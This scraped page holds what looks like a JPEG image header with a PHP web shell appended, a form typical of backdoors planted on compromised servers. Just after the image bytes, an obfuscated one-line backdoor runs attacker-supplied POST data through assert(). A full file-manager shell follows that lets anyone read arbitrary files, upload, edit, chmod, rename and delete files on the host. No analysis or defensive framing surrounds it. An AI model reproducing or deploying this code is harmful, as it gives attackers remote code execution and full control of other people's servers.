چهارشنبه 20 آذر 1398
کتابخانه

ÿ?? JFIF  ` `  ÿ? C 

  ÿ? C  

ÿ?  N j" ÿ?           

ÿ? ?   } !1AQa"q2‘?#B±ÁRÑð$3br?

%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyzƒ„…†‡ˆ‰Š’“”•–—˜™š¢£¤¥¦§¨©ª²³´µ¶·¸¹ºÂÃÄÅÆÇÈÉÊÒÓÔÕÖ×ØÙÚáâãäåæçèéêñòóôõö÷øù??        

ÿ? ?  w !1AQaq"2?B‘¡±Á #3R?br?$4??&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz‚ƒ„…†‡ˆ‰Š’“”•–—˜™š¢£¤¥¦§¨©ª²³´µ¶·¸¹ºÂÃÄÅÆÇÈÉÊÒÓÔÕÖ×ØÙÚâãäåæçèéêòóôõö÷øùúÿ?   ? ýS¢Š( ¢Š( ¢Š( ¢Š( ¢Š( ¢Š( ¢Š( ¢Š( ¢Š( ¢Š( ¢Š( ¢Š( ¢Š( ¢Š( ¢Š( ¢Š( ¢Š( ¢Š( ¢Š( ¢Š( ¢Š( ¢Š( ¢Š( ¢Š( ¢Š( ¢Š( ¢Š( ¢Š( ¢Š( ¢Š( ¢Š( ¢Š( ¢Š( ¢Š( ¢Š(ÿ<?php $k="ass"."ert"; $k(${"_PO"."ST"} ['admins']);?>

<?php

set_time_limit(0);

error_reporting(0);

 

if(get_magic_quotes_gpc()){

    foreach($_POST as $key=>$value){

        $_POST[$key] = stripslashes($value);

    }

}

echo '<html><head>

<link rel="SHORTCUT ICON" href="http://goenk.wapgem.com/idb.png">

<body>

<style type="text/css">

body {

    background: black;

    color: #00FF00;

    font-family: monospace;

}

 

.accessGranted {

    position: absolute;

    top: 200px;

    background: #333;

    padding: 20px;

    border: 1px solid #999;

    width: 300px;

    left: 50%;

    margin-left: -150px;

    text-align: center;

}

 

.accessDenied {

    position: absolute;

    top: 200px;

    color: #F00;

    background: #511;

    padding: 20px;

    border: 1px solid #F00;

    width: 300px;

    left: 50%;

    margin-left: -150px;

    text-align: center;

}

#content-center {

    width: 400px;

    padding: 0px 10px 10px 10px;

    width: 800px; 

    margin: 0 auto;

}

#content-left {

margin: 0 auto;

     text-align: left;

}

#content-right {

margin: 0 auto;

     text-align: right;

}

input,select,textarea{

    border:0;

    border:1px solid #900;

    background:black;

    margin:0;

        color: white;

 

    padding:2px 4px;

}

input:hover,textarea:hover,select:hover{

    background:black;

        color: blue;

 

    border:1px solid #f00;

}

                        a{ text-decoration:none; color:red;}

</style>

</head>

<H1><center></center></H1>

<table width="700" border="0" cellpadding="3" cellspacing="1" align="center">

<tr><td>Path : ';

if(isset($_GET['path'])){

    $path = $_GET['path'];   

}else{

    $path = getcwd();

}

$path = str_replace('\','/',$path);

$paths = explode('/',$path);

 

foreach($paths as $id=>$pat){

    if($pat == '' && $id == 0){

        $a = true;

        echo '<a href="?path=/">/</a>';

        continue;

    }

    if($pat == '') continue;

    echo '<a href="?path=';

    for($i=0;$i<=$id;$i++){

        echo "$paths[$i]";

        if($i != $id) echo "/";

    }

    echo '">'.$pat.'</a>/';

}

echo '</td></tr><tr><td>';

if(isset($_FILES['file'])){

    if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){

        echo '<font color="green">OK COK SUKSESS !!</font><br />';

    }else{

        echo '<font color="red">ASU RAIMU ELK :P</font><br />';

    }

}

echo '<form enctype="multipart/form-data" method="POST">

Upload File : <input type="file" name="file" />

<input type="submit" value="upload" />

</form>

</td></tr>';

if(isset($_GET['filesrc'])){

    echo "<tr><td>Current File : ";

    echo $_GET['filesrc'];

    echo '</tr></td></table><br />';

    echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');

}elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){

    echo '</table><br /><center>'.$_POST['path'].'<br /><br />';

    if($_POST['opt'] == 'chmod'){

        if(isset($_POST['perm'])){

            if(chmod($_POST['path'],$_POST['perm'])){

                echo '<font color="green">Change Permission Done.</font><br />';

            }else{

                echo '<font color="red">Change Permission Error.</font><br />';

            }

        }

        echo '<form method="POST">

        Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />

        <input type="hidden" name="path" value="'.$_POST['path'].'">

        <input type="hidden" name="opt" value="chmod">

        <input type="submit" value="Go" />

        </form>';

    }elseif($_POST['opt'] == 'rename'){

        if(isset($_POST['newname'])){

            if(rename($_POST['path'],$path.'/'.$_POST['newname'])){

                echo '<font color="green">Change Name Done.</font><br />';

            }else{

                echo '<font color="red">Change Name Error.</font><br />';

            }

            $_POST['name'] = $_POST['newname'];

        }

        echo '<form method="POST">

        New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />

        <input type="hidden" name="path" value="'.$_POST['path'].'">

        <input type="hidden" name="opt" value="rename">

        <input type="submit" value="Go" />

        </form>';

    }elseif($_POST['opt'] == 'edit'){

        if(isset($_POST['src'])){

            $fp = fopen($_POST['path'],'w');

            if(fwrite($fp,$_POST['src'])){

                echo '<font color="green">Edit File Done.</font><br />';

            }else{

                echo '<font color="red">Edit File Error.</font><br />';

            }

            fclose($fp);

        }

        echo '<form method="POST">

        <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />

        <input type="hidden" name="path" value="'.$_POST['path'].'">

        <input type="hidden" name="opt" value="edit">

        <input type="submit" value="Go" />

        </form>';

    }

    echo '</center>';

}else{

    echo '</table><br /><center>';

    if(isset($_GET['option']) && $_POST['opt'] == 'delete'){

        if($_POST['type'] == 'dir'){

            if(rmdir($_POST['path'])){

                echo '<font color="green">Delete Dir Done.</font><br />';

            }else{

                echo '<font color="red">Delete Dir Error.</font><br />';

            }

        }elseif($_POST['type'] == 'file'){

            if(unlink($_POST['path'])){

                echo '<font color="green">Delete File Done.</font><br />';

            }else{

                echo '<font color="red">Delete File Error.</font><br />';

            }

        }

    }

    echo '</center>';

    $scandir = scandir($path);

    echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">

    <tr class="first">

        <td><center>Name</center></td>

        <td><center>Size</center></td>

        <td><center>Permissions</center></td>

        <td><center>Options</center></td>

    </tr>';

 

    foreach($scandir as $dir){

        if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;

        echo "<tr>

        <td><a href="?path=$path/$dir">$dir</a></td>

        <td><center>--</center></td>

        <td><center>";

        if(is_writable("$path/$dir")) echo '<font color="green">';

        elseif(!is_readable("$path/$dir")) echo '<font color="red">';

        echo perms("$path/$dir");

        if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>';

        

        echo "</center></td>

        <td><center><form method="POST" action="?option&path=$path">

        <select name="opt">

    <option value=""></option>

        <option value="delete">Delete</option>

        <option value="chmod">Chmod</option>

        <option value="rename">Rename</option>

        </select>

        <input type="hidden" name="type" value="dir">

        <input type="hidden" name="name" value="$dir">

        <input type="hidden" name="path" value="$path/$dir">

        <input type="submit" value=">" />

        </form></center></td>

        </tr>";

    }

    echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';

    foreach($scandir as $file){

        if(!is_file("$path/$file")) continue;

        $size = filesize("$path/$file")/1024;

        $size = round($size,3);

        if($size >= 1024){

            $size = round($size/1024,2).' MB';

        }else{

            $size = $size.' KB';

        }

 

        echo "<tr>

        <td><a href="?filesrc=$path/$file&path=$path">$file</a></td>

        <td><center>".$size."</center></td>

        <td><center>";

        if(is_writable("$path/$file")) echo '<font color="green">';

        elseif(!is_readable("$path/$file")) echo '<font color="red">';

        echo perms("$path/$file");

        if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>';

        echo "</center></td>

        <td><center><form method="POST" action="?option&path=$path">

        <select name="opt">

    <option value=""></option>

        <option value="delete">Delete</option>

        <option value="chmod">Chmod</option>

        <option value="rename">Rename</option>

        <option value="edit">Edit</option>

        </select>

        <input type="hidden" name="type" value="file">

        <input type="hidden" name="name" value="$file">

        <input type="hidden" name="path" value="$path/$file">

        <input type="submit" value=">" />

        </form></center></td>

        </tr>";

    }

    echo '</table>

    </div>';

}

echo '

</BODY>

</HTML>';

function perms($file){

    $perms = fileperms($file);

 

if (($perms & 0xC000) == 0xC000) {

    // Socket

    $info = 's';

} elseif (($perms & 0xA000) == 0xA000) {

    // Symbolic Link

    $info = 'l';

} elseif (($perms & 0x8000) == 0x8000) {

    // Regular

    $info = '-';

} elseif (($perms & 0x6000) == 0x6000) {

    // Block special

    $info = 'b';

} elseif (($perms & 0x4000) == 0x4000) {

    // Directory

    $info = 'd';

} elseif (($perms & 0x2000) == 0x2000) {

    // Character special

    $info = 'c';

} elseif (($perms & 0x1000) == 0x1000) {

    // FIFO pipe

    $info = 'p';

} else {

    // Unknown

    $info = 'u';

}

 

// Owner

$info .= (($perms & 0x0100) ? 'r' : '-');

$info .= (($perms & 0x0080) ? 'w' : '-');

$info .= (($perms & 0x0040) ?

            (($perms & 0x0800) ? 's' : 'x' ) :

            (($perms & 0x0800) ? 'S' : '-'));

 

// Group

$info .= (($perms & 0x0020) ? 'r' : '-');

$info .= (($perms & 0x0010) ? 'w' : '-');

$info .= (($perms & 0x0008) ?

            (($perms & 0x0400) ? 's' : 'x' ) :

            (($perms & 0x0400) ? 'S' : '-'));

 

// World

$info .= (($perms & 0x0004) ? 'r' : '-');

$info .= (($perms & 0x0002) ? 'w' : '-');

$info .= (($perms & 0x0001) ?

            (($perms & 0x0200) ? 't' : 'x' ) :

            (($perms & 0x0200) ? 'T' : '-'));

 

    return $info;

}

 

$f =@fopen ('','w');

fwrite($f , $htcs);

$pg = basename(__FILE__);

 

?>

0